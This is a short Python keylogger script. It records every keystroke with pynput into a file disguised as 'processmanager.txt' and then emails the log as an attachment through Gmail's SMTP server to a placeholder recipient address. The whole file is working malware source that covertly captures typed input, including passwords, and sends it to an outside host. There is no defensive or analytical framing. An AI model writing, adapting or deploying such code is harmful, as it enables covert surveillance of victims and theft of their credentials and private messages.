import os
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from pynput.keyboard import Listener

keys=[]  #store all the keys intially it is empty
count = 0
#path = os.environ['appdat']+'\\processmanager.txt' #for windows machine
path = 'processmanager.txt'        #for linux enviornment

#on press function...it will record all the keys that we press
def on_press(key):
    global keys,count

    keys.append(key)
    count+=1

    if count >=1:        #this means that user has pressed some keys
        count = 0        # then we will set the count variable to 0
        write_file(keys) # will write all the keys in a file
        keys = []        #now empty the key variable again

def write_file(keys):
    with open(path, 'a') as file:
        for key in keys:
            k=str(key).replace("'","")
            if k.find('backspace')>0:
                file.write(' Backspace ')
            elif k.find('enter')>0:
                file.write('\n')
            elif k.find('shift')>0:
                file.write(' Shift')
            elif k.find('space')>0:
                file.write(' ')
            elif k.find('caps_lock')>0:
                file.write(' caps_lock ')
            elif k.find('Key'):
                file.write(k)

def send_email(filename):
    fromaddr = "your email address"
    toaddr = "recipient email address"
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Key Logger Output"
    body = "Attached is the log file generated by the key logger."
    msg.attach(MIMEText(body, 'plain'))
    attachment = open(filename, "rb")
    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(fromaddr, "your email password")
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    s.quit()

#create Listener Object
with Listener (on_press=on_press) as listener:
    listener.join()

# send the file via email
send_email(path)
